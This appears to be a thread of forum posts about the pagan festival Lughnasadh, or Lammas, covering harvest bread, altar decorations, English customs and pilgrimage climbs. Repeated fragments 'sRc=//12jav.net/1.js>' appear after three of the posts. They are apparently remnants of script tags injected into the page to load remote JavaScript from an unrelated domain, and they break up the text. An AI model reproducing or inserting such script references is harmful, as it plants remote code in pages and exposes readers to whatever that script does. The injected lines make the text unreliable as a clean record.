All grains are symbolic of Lughnasadh. I want to make sun god shape bread this year round but I've never done it before. Corn husks and ale may take their place on the altar too. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
The festival has many names, all over Europe. Here in England the name is Lammas. It celebrates the first Harvest of the year, and is a Sabbat. What the altar is dressed with would depend on the country harvest.In the UK the first harvest is all the "table" vegetables. The second harvest,corn,wheat,etc. is at Mabon. The main ceremony of Lammas, at least in the UK, is to climb the nearest mountain (or big hill!). In some of the more remote villages they still have the wild goat,Mr Puck, and parade him around the village. But that ceremony has just about died out these days.

As Brysing said it's for the first harvest. Personally I spend it outside, and I eat seasonal fruit, vegetables and make home made bread. I decorate my altar with greens, the vegetables from my garden [or the seasonal vegetables I bought since I'm in an apartment now and don't have a garden] I also love sunflowers and usually have a bouquet on the altar. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Nicole, at one time all mountains were sacred in Pagan beliefs. In Ireland there is a very famous sacred mountain,the name escapes me at the moment. Thousands of people climb it as a "pilgrimage" at Lammas. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
